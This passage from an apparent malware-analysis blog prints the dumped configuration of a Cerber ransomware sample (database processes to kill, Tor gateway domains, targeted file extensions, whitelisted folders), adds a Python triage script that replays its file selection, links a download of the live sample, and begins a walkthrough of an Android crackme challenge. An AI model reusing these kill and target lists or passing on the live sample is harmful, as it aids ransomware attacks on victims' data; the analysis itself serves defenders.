<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">check</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">language</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">close_process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">close_process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">process</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqbcoreservice.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeagntsvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeencsvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocssd.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">agntsvc.exeisqlplussvc.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dbeng50.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dbsnmp.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">fbserver.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">firefoxconfig.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">msftesql.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mydesktopqos.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mydesktopservice.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld-nt.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld-opt.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mysqld.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocautoupds.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ocomm.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlbrowser.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">oracle.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlwriter.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlagent.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tbirdconfig.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sqlservr.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.orf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">synctime.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.nyf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">xfssvccon.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">debug</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">default</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.to</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.cab</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.nu</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">onion.link</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">site_5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tor2web.org</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p27dokhpz2n7nvgr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">encrypt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bytes_skip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">divider</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">encrypt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">files</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.123</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.1cd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3dm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3ds</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3fr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3g2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3gp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.3pr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.602</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.7z</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.7zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aac</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ab4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.abd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.acc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accde</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.accdt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ach</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.acr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.act</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.adb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.adp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ads</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aes</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.agdl</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ai</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aiff</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ait</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.al</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aoi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.apj</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.apk</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.arc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.arw</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.ascx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.aspx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asset</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.asx</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.atb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.avi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.awg</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.back</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.backup</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.backupdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bak</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bank</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bay</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bdb</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bgt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bik</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bkp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.blend</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">.bmp</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">................................................</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">.jpg</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">data_finish</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">file_extension</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\steam\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">files_name</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_{RAND}_README_</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">run_by_the_end</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">self_deleting</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">statistics</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">background</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">text</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">whitelist</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\bitcoin\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\excel\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft sql server\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\powerpoint\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\excel\</span></div>
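<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The two lists dumped above (the extensions under <b>encrypt / files</b> and the folders under <b>whitelist / folders</b>) are what decide which files this Cerber build touches. The script below is an added example for this write-up, not code from the sample: it loads a constructed subset of those lists and replays the selection against a constructed host listing, which is handy for triage ("what would this sample have hit on this machine?"). The matching semantics are assumptions: whitelist entries are treated as case-insensitive substrings of the full path (their backslash-delimited form suggests that), and extensions are compared case-insensitively against the path suffix. The ransom-note name is expanded from the <b>files_name</b> pattern <b>_{RAND}_README_</b> with a hypothetical random token.</span></div>

```python
"""Replay the file-targeting rules from the dumped Cerber configuration.

Added example for this write-up (not the sample's own code). Only config
keys visible in the dump are used; matching semantics and the random token
format are assumptions, labelled below.
"""
import ntpath
import secrets
from typing import Dict, Iterable, List, Optional

# Constructed subset of the dumped config (only keys visible in the dump).
CONFIG: Dict = {
    "encrypt": {
        "files": [".123", ".1cd", ".3dm", ".7z", ".7zip", ".accdb", ".bak",
                  ".bat", ".bin", ".bmp", ".jpg"],
    },
    "files_name": "_{RAND}_README_",
    "whitelist": {
        "folders": ["\\bitcoin\\", "\\excel\\", "\\microsoft sql server\\",
                    "\\microsoft\\powerpoint\\", "\\microsoft\\excel\\"],
    },
}


def is_whitelisted(path: str, folders: Iterable[str]) -> bool:
    """True if any whitelisted folder fragment occurs anywhere in the path.
    Case-insensitive substring match (assumption, see lead-in)."""
    p = path.lower()
    return any(f.lower() in p for f in folders)


def has_target_extension(path: str, extensions: Iterable[str]) -> bool:
    """True if the file's extension (last dot onward) is in the list.
    ntpath is used so Windows separators are handled on any host."""
    ext = ntpath.splitext(path)[1].lower()
    return ext != "" and ext in {e.lower() for e in extensions}


def would_encrypt(path: str, config: Dict = CONFIG) -> bool:
    """Whitelist wins over the extension list (assumption)."""
    if is_whitelisted(path, config["whitelist"]["folders"]):
        return False
    return has_target_extension(path, config["encrypt"]["files"])


def select_targets(paths: Iterable[str], config: Dict = CONFIG) -> List[str]:
    """Paths from `paths` that the rules would encrypt, in input order."""
    return [p for p in paths if would_encrypt(p, config)]


def ransom_note_name(config: Dict = CONFIG, rand: Optional[str] = None) -> str:
    """Expand _{RAND}_README_ with a token. The 8-hex-digit token is a
    hypothetical choice; the sample's own generator is not shown here."""
    token = rand if rand is not None else secrets.token_hex(4)
    return config["files_name"].replace("{RAND}", token)


# Constructed host listing used to exercise the rules.
SAMPLE_PATHS = [
    r"C:\Users\ana\Documents\balance.accdb",              # targeted
    r"C:\Users\ana\Pictures\IMG_0001.JPG",                # targeted (case)
    r"C:\Users\ana\Downloads\backup.7zip",                # targeted
    r"C:\Program Files\Microsoft SQL Server\data.bak",    # whitelisted folder
    r"C:\Users\ana\AppData\Roaming\Bitcoin\wallet.bin",   # whitelisted folder
    r"C:\Windows\System32\kernel32.dll",                  # extension not listed
    r"C:\Users\ana\Desktop\notes",                        # no extension
]

if __name__ == "__main__":
    for p in select_targets(SAMPLE_PATHS):
        print("would encrypt:", p)
    print("ransom note:", ransom_note_name(rand="a1b2c3d4"))
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Run against the constructed listing, only the first three paths are selected: the SQL Server and Bitcoin files survive because their folders are whitelisted, which matches the intent of those entries (do not break the victim's wallet or database server).</span></div>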
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The public key</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkSVkN8kFwgXAQ40vIjlSgAYZfIcBoiSsVLy86tAPyc8lZLhGlSVhN7bOuAQxy_JevE2CC0wTa0_looMsX4oDda4bWK63V3QZVXh9U_otoPMe6YU9OdHwdGJYlkItvDxFhcKKiVTRZHm0/s1600/pkey.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkSVkN8kFwgXAQ40vIjlSgAYZfIcBoiSsVLy86tAPyc8lZLhGlSVhN7bOuAQxy_JevE2CC0wTa0_looMsX4oDda4bWK63V3QZVXh9U_otoPMe6YU9OdHwdGJYlkItvDxFhcKKiVTRZHm0/s640/pkey.jpg" width="488" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Here are the sample and the dump. Handle them with great care: this is live ransomware, so analyse it only in an isolated VM.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/cerber-29-12-16.rar</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">That's all for 2016. @Dkavalanche </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></div>
<b><br /></b>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-63307678009466854232016-12-27T10:15:00.000-08:002017-03-27T18:17:17.623-07:00<b style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;">Solving the ESET Ekoparty 2016 #eko12 Android challenge No. 10 - PART 2</b><br />
<b style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"><br /></b><span style="background-color: white; color: #444444;"></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white; color: #444444;"><br /></b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">As we left off in <a href="http://oberheimdmx.blogspot.com.ar/2016/12/resolviendo-el-reto-nro-10-android-de.html">PART 1</a>, CrackmeBaby.apk decrypts a new .apk:</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>content.apk </b><span class="Apple-tab-span" style="white-space: pre;"> </span>SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>94317deb79ced2ece91b413d142492c76c876a320957a0f21bdf2a8150d6d427</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHjYVPVqKbT5qZlgYtWsvqzLc0ilBWIZKKdbALUtHraGQHFFfmrEusTIkMgEl6XskwrIEleOKPoHd7_TFaD1vZ2ndNqwJbGbLx3NxoMxHs1fnkzn0i43XsLDaPi5DmI40oKSl8n2tAiQ/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHjYVPVqKbT5qZlgYtWsvqzLc0ilBWIZKKdbALUtHraGQHFFfmrEusTIkMgEl6XskwrIEleOKPoHd7_TFaD1vZ2ndNqwJbGbLx3NxoMxHs1fnkzn0i43XsLDaPi5DmI40oKSl8n2tAiQ/s400/02.jpg" width="238" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We launch the app and it shows us this image; evidently we are doing something wrong.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOe8xpuU8FmMTRqy7g8bofEW5LAnldiZn2FikPEqIQKRK8jdmlaUXCEjE6QYmCkPDFF-JFYUeq15pk-8VazpnoM7FYdbR9-UqrcR3LFNIgwaG8YzTTsMm-MOjh2oIvn4GvzzXm-KlIjSA/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOe8xpuU8FmMTRqy7g8bofEW5LAnldiZn2FikPEqIQKRK8jdmlaUXCEjE6QYmCkPDFF-JFYUeq15pk-8VazpnoM7FYdbR9-UqrcR3LFNIgwaG8YzTTsMm-MOjh2oIvn4GvzzXm-KlIjSA/s400/03.jpg" width="242" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">We decompile it with APK Multi-Tool.</span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">There are two activities: </span></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperActivity</b> and<b> </b></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperbActivity.</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">We can see this in </span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">AndroidManifest.xml:</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9IPrBvXWq9cotb5JhKG8Qj7er_9YIKUN9mGIHF5yyRGcYMmwze_OfKzXTeAybUQrDn0qLWXrhjNbaYGw4MdWGst6VVrK5ygbQDl5AME4E8YOilI9OEw4Qlpny9sAS2nKb02ecA5jIf8/s1600/manifest-orig.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9IPrBvXWq9cotb5JhKG8Qj7er_9YIKUN9mGIHF5yyRGcYMmwze_OfKzXTeAybUQrDn0qLWXrhjNbaYGw4MdWGst6VVrK5ygbQDl5AME4E8YOilI9OEw4Qlpny9sAS2nKb02ecA5jIf8/s640/manifest-orig.jpg" width="640" /></a></div>
<br />
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">The activity started by default (the one carrying the MAIN/LAUNCHER intent-filter) is </span><span style="color: #444444;">SuperActivity, and its code only displays an image (the Obi-Wan one):</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTZCk1MHWhsgPSZXuVMQZEd_Gd_sT96espWsYw04zoVS181qSLOTqvYsYHx1a2WPVsMes-ngGON5d9bvXp_KeWot5sK-gbYye4IpevkHp-92DfZlsq76Ci0Ml_wNoc2x_1kTbnfWwBUwY/s1600/Activity.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTZCk1MHWhsgPSZXuVMQZEd_Gd_sT96espWsYw04zoVS181qSLOTqvYsYHx1a2WPVsMes-ngGON5d9bvXp_KeWot5sK-gbYye4IpevkHp-92DfZlsq76Ci0Ml_wNoc2x_1kTbnfWwBUwY/s640/Activity.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>SuperbActivity </b>does more interesting things, but nothing in the app ever starts it, so we will force it to start.</span><br />
<b style="color: #444444; font-family: "Courier New", Courier, monospace; font-size: small;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCpTwnRsdYhCKAaS-QZ4MRFN59jK5RB1e1BpY_9J-nIXDRFkCIkiFvf7FRCUg2d6hMVfrByxosDEXLnAyEr0xXS6kllZwmuowa6EMamOpxf6TFA1P-FU0cQJ4ngmSOfP53OJzIlqVFaA/s1600/Activity2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCpTwnRsdYhCKAaS-QZ4MRFN59jK5RB1e1BpY_9J-nIXDRFkCIkiFvf7FRCUg2d6hMVfrByxosDEXLnAyEr0xXS6kllZwmuowa6EMamOpxf6TFA1P-FU0cQJ4ngmSOfP53OJzIlqVFaA/s640/Activity2.jpg" width="640" /></a></div>
